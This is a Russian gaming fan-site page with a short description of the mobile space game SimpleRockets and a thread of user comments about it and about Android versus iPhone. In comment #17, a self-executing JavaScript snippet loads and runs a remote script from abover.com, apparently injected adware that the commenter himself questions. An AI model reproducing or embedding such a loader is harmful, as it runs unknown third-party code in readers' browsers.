Авторизация
или
или
Зарегистрироваться на сайте
Возник вопрос? Столкнулись с проблемой? Есть предложение?

Мы вам поможем!

Пишите нам на почту: [email protected] и мы вам ответим в ближайшее время, так же вы можете воспользоваться формой обратной связи прямо с сайта.

Последние комментарии
Вчера, 22:44
кстати, не очень привычно, слева дизы - справа плюсы....
Вчера, 22:43
блин, этому коменту хотел плюсануть, а случайно минусанул. Крафт шикарен - качаю, играл во все БФки, ща играю в 4-ю. давно хотел парящий крафт на который можно приземлиться (на подбии ЩИТа из "марвела") однозначно + за крафт!!!!!!!!!!!
20 января 2017 21:48
Это тот, у кого руки вроде из плечей ростут, но по привычке еще через жопу тянутся
20 января 2017 20:58
На мой взгляд, для таких видео на данном сайте практически отсутствует целевая аудитория. Целевая аудитория только периодически выкладывает здесь очередной говнопост и валит обратно в группу таких же Вконтакте. Кстати, а кто такой "не совсем нуб"? Тот, у кого руки все ещё из жопы, но ЧСВ уже выросло?
20 января 2017 17:30
Простите, я только начинал делать крафты когда зарегистрировался на сайте и выложил ужасную вещь. Но теперь... ...администрация сайта не даёт выкладывать более стоящие внимания и лайков крафты! Я выложил корабль апполон 11 и кучу кораблей в стиле апполона на Минимус но ни одного на сайте не выложили!!!!! )-: И нет там скринов потому что сайт их размещать не даёт!!! И да, я соглашаюсь с вами насчёт этой новости -"Минус с Минимус"!
19 января 2017 23:35
Тогда я в шоке. Линкор жт перебор. Он сам как целая программа. В KASкстати жесткие соединения есть? Я чет забыл...
19 января 2017 22:06
попрошу указать уровень сарказма.
19 января 2017 22:05
у меня все грузится
19 января 2017 21:28
Эпик в апогее! Вот это круто, только ферменных конструкций бы побольше... и орбитальный линкор не помешал бы)
19 января 2017 20:29
а я чето плюс поставил, хотя посмотрел минуты 2е второй и 3й серии. Ну просто вспомнил себя :) тоже когда-то поделиться свершениями хотелось
19 января 2017 13:29
Ок, просто из твоей сборки мод Kethane отказывается работать (не показывает концентрацию ресурсов на карте).
18 января 2017 23:06
Мод понравился, вот только с ним не работает деталь "Fuel Cell" (топливные ячейки) или так и должно быть?
18 января 2017 21:07
Скучно и много воды. П.С. 3-я серия не грузится.
18 января 2017 14:26
1.2.2 у меня. с модами на 1.2.2... кроме трех каких-то
18 января 2017 14:12
Автор, у тебя версия KSP 1.2.1?
18 января 2017 07:43
Спайс центр? СПАЙС ЦЕНТР???
18 января 2017 07:15
Потому что "а вот еще одна интересная фишка" видео уже куча. А тут необычный способ подачи. Получается что не совсем нуб рассказывает совсем нубам, как ими не быть. С одной стороный я и сам узнаю новое, а с другой рассказываю этои как я к этому пришел другим. В этом и кроется главная суть.
18 января 2017 00:15
Шо, еще полтора часа "ой, а чо эта за фигня!" и "фсемприветсегоднямы"? Интересно было бы, если бы ты сам предварительно разобрался, а потом показывал в стиле "а вот еще одна интересная фишка". А так это не то, чтобы мусор, но и полезность околонулевая. Зачем ты это делаешь - не знаю.
17 января 2017 16:17
Никак. Статья была склейкой из трех частей, после переезда все полетело в тартарары. з.ы. Да, и коммент оставить тоже проблема... постится около 5 минут О_о. Дико тормозит движок.
16 января 2017 19:57
Самое забавное - на орбите Кербина этому шедевру делать абсолютно нечего. Один плюс от этого поста есть - еще раз заворожено пересмотрел это безумное творение)
16 января 2017 19:37
Согласен, раньше было больше вкладок и Модов. Из-за этого любимый мод на новые ионные двигатели не могу скачать
16 января 2017 13:21
Простите сударь, но пост гавно. Да причем отьорнейшее улично-сартирное, как мой юмор на праздниках.
15 января 2017 18:41
Ересь! Я повешусь! Столько ереси не было никогда!
15 января 2017 14:47
Подарок Бездне и Кракену на старый новый год.
15 января 2017 13:35
Что-то я мало что тут вижу... Хотя бы форум просмотрел для приличия. Давно уже показывали - Эпические видео процесса игры в KSP
15 января 2017 12:45
Этажы плогеат к тому же https://www.youtube.com/watch?v=ONP9jS14toE
15 января 2017 12:24
Было бы что заценивать - может, и заценили бы.
15 января 2017 11:10
В 1.2.2 изменились показатели уровня учёного (скорость получения науки). Теперь они такие: 0 0.00135 1 0.00675 2 0.00810 3 0.00945 4 0.01080 5 0.01215 Т.е. раньше коэффициент рос с уровнем как х5, х9, х13, х17, х21, а теперь как х5, х6, х7, х8, х9. Понерфили лабораторию.
Показать все
Список игр в нашей базе

SimpleRockets v1.3

 

 • Разработчик / Developer: Jundroo, LLC (2)

 

Возможно, вы играли в популярный космический симулятор Kerbal Space Program на PC? Тогда вам несомненно понравится играть в SimpleRockets на своём смартфоне!

 

Разрабатывайте свои собственные космические корабли. Вылетайте в космос. Исследуйте солнечную систему. Смотрите, если у вас есть что нужно, чтобы быть ученым.

СОЗДАВАЙТЕ
Выбирайте и соединяяте части вместе, чтобы построить космический корабль. Вы можете выбирать из целого ряда ракетных двигателей, топливных баков и других вещей. Можно даже строить роверы с колесами. Вы ограничены только вашим воображением.

ИССЛЕДУЙТЕ
Стартуйте любой планеты. Вы можете летать через плотную атмосферу Венеры, или вы можете воспользоваться низкой гравитацией Меркурия. Обернитесь вокруг Солнца и отправьтесь к далеким пределам Солнечной системы.

ВЫЗОВЫ
В игре имеется ряд вызовов, и вы можете соревноваться с другими людьми со всего мира, чтобы увидеть, кто может взлететь быстрее, улететь дальше, выйти на орбиту с наименьшим количеством использованного топлива, приземлиться на Луну, и многое другое.

РАКЕТОСТРОЕНИЕ
Кеплер написал уравнения 400 лет назад, и SimpleRockets использует эти уравнения для моделирования чрезвычайно реалистичной орбитальной физики. В процессе изучения Солнечной системы игроки изучают ракетостроение и астродинамику. Поэтому SimpleRockets - здоровая альтернатива шквалу безмозглых игр, доступных в App Store.

Системные требования: Android 2.2+;
Язык: Английский.

Ссылка: https://play.google.com/store/apps/details?id=com.jundroo.simplerocketsandroida1&hl=ru

    Комментарии
    Подсветить мои комментарии
    1. Kerbiter 22 сентября 2013 21:39, Гости, {repa} #1
      Вау, круто

      0
    2. Insentient 22 сентября 2013 21:54, Посетители, {repa} #2
      Давно играю, очень интересно!
      0
    3. Йцукен 22 сентября 2013 21:56, Посетители, {repa} #3
      Я как раз недавно скачал!!!
      Игра круть!!!
      Советую всем!!!
      0
    4. IronS 22 сентября 2013 22:04, Посетители, {repa} #4
      Как раз с такого KSP и начинала tears
      0
    5. Kerbiter 22 сентября 2013 22:34, Гости, {repa} #5
      Как раз с такого KSP и начинала
       Смотрим профиль:
      • Полное имя: Viktor
        whut
      0
    6. Grage 22 сентября 2013 22:39, Редактор, {repa} #6
      Цитата: manhak
      Как раз с такого KSP и начинала

       Смотрим профиль:
      • Полное имя: Viktor
        whut

      Вот это поворот  am
      0
    7. Kerbiter 22 сентября 2013 22:49, Гости, {repa} #7
      Вот это поворот 
      KSP меняет людей angry
       
      Хирургическим путем...
      0
    8. Kostyan_Troll 22 сентября 2013 22:52, Посетители, {repa} #8
      Блин, игра замечательная! Намного интересней всяких простеньких игр на телефон ) Качайте все, советую  tears
      0
    9. Kerbiter 22 сентября 2013 22:54, Гости, {repa} #9
      С удовольствием бы, да только телефон мой андроидовские приложения не поддерживает. Хотяяя... Если на комп эмулятор загрузить.
      0
    10. Vasa 22 сентября 2013 23:05, Посетители, {repa} #10
      Я купил эту игру ещё за 3 дня до обзора скота манли! Это первая купленная мною игра на андроид.
      0
    11. Fidel 23 сентября 2013 00:51, Хорошие люди, {repa} #11
      Мне кажется ,что без знания англа я не смогу в неё поиграть , эх чёртов языковой барьер! 
      0
    12. parataka 23 сентября 2013 01:23, Посетители, {repa} #12
      2D пффф
       
      0
    13. Siuthin 23 сентября 2013 03:32, Гости, {repa} #13
      Да какого хера на android бесплатно, а на iPhone 66 рублей?
      0
    14. Dvidio 23 сентября 2013 08:56, Посетители, {repa} #14
      Цитата: Siuthin
      Да какого хера на android бесплатно, а на iPhone 66 рублей?

      андроид рулит
       у меня не бесплатно  crying

      0
    15. Grage 23 сентября 2013 13:35, Редактор, {repa} #15
      Цитата: dvidio
      s>
      Цитата: Siuthin
      Да какого хера на android бесплатно, а на iPhone 66 рублей?

      андроид рулит  у меня не бесплатно  crying

      Кому я ссылку кинул на бесплатную версию??? 
      0
    16. Kostyan_Troll 23 сентября 2013 13:59, Посетители, {repa} #16
      Цитата: Fidel
      Мне кажется ,что без знания англа я не смогу в неё поиграть , эх чёртов языковой барьер! 

      поверь, сможешь ) там все довольно просто и понятно )
      0
    17. Aleksart 23 сентября 2013 14:27, Посетители, {repa} #17
      В платной версии деталей больше ? (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

      Что за херня в сообщения вставляется ?....
       
      0
    18. IronS 23 сентября 2013 14:38, Посетители, {repa} #18
      Цитата: Grage
      Цитата: manhak
      Как раз с такого KSP и начинала

       Смотрим профиль:
      • Полное имя: Viktor
        whut

      Вот это поворот  am
      Эээ... Я что то пропустил?
      0
    19. Sngok 23 сентября 2013 14:47, Посетители, {repa} #19
      Цитата: IronS
      Цитата: Grage
      Цитата: manhak
      Как раз с такого KSP и начинала

       Смотрим профиль:
      • Полное имя: Viktor
        whut

      Вот это поворот  am

      Эээ... Я что то пропустил?

      xd xd xd xd xd
      Лол xd xd
      0
    20. Lolike 23 сентября 2013 14:55, Посетители, {repa} #20
      кто сомневаеюся андроид 2.3прет.
      0
    21. IronS 23 сентября 2013 14:59, Посетители, {repa} #21
      Ясно... Возможно моя ава конфликтует с мировоззрением школьного возраста. Ах, эти наивные года... hmhm


      0
    22. KaneDaz 23 сентября 2013 17:59, Посетители, {repa} #22
      Цитата: Siuthin
      Да какого хера на android бесплатно, а на iPhone 66 рублей?

      И на Андроид платно, только 64 рубля! Ну, что, кто с 4PDA скачал? ПРИЗНАВАЙТЕЗЪ!!!
      *шутка*
      0
    23. Kostyan_Troll 23 сентября 2013 20:01, Посетители, {repa} #23
      да ху*ня этот айфон ) чем вам андройд не нравится?.. Айфон по большей мере всего лишь бренд.
      0
    24. ada x 23 сентября 2013 20:46, Посетители, {repa} #24
      0
    25. Kerbiter 23 сентября 2013 21:04, Модераторы, {repa} #25
      Что за фигня?! Какого авторы у платной и бесплатной версии не совпадают??? mad
      0
    26. Aleksart 23 сентября 2013 22:35, Посетители, {repa} #26
      Таки кто скажет в чём отличие платной версии от бесплатной ? 
      0
    27. Alonso_de_ojeda 23 сентября 2013 23:41, Посетители, {repa} #27
      Прикольно =)
      0
    28. Dunwell Choke 24 сентября 2013 00:41, Администраторы, {repa} #28
      Цитата: Kostyan_Troll
      да ху*ня этот айфон ) чем вам андройд не нравится?.. Айфон по большей мере всего лишь бренд.

      Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.
      0
    29. vitally 24 сентября 2013 11:29, Гости, {repa} #29
      Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.
       
      Купите андройд за такую цену как айфон, а н в пять раз дешевле, и будет вам и производительность и плавность и без лагов! А то поривыкали покупатьт буджетки.
      0
    30. Aleksart 24 сентября 2013 20:47, Посетители, {repa} #30
      Цитата: Dunwell
      Производительность, плавность, закрытость - вот чем лучше. Он хотя бы не лагает в меню.
      Производительность, плавность, открытость, не лагает ни в меню ни в играх ни в каких либо других приложениях, + большой экран получше чем у яблока. Ну и чем мой телефон на андроиде хуже вашего ? Ах да, у меня же файлы можно передавать и музыку напрямую с компа кидать, о ужас)))
      Холивар объявляю открытым))

      0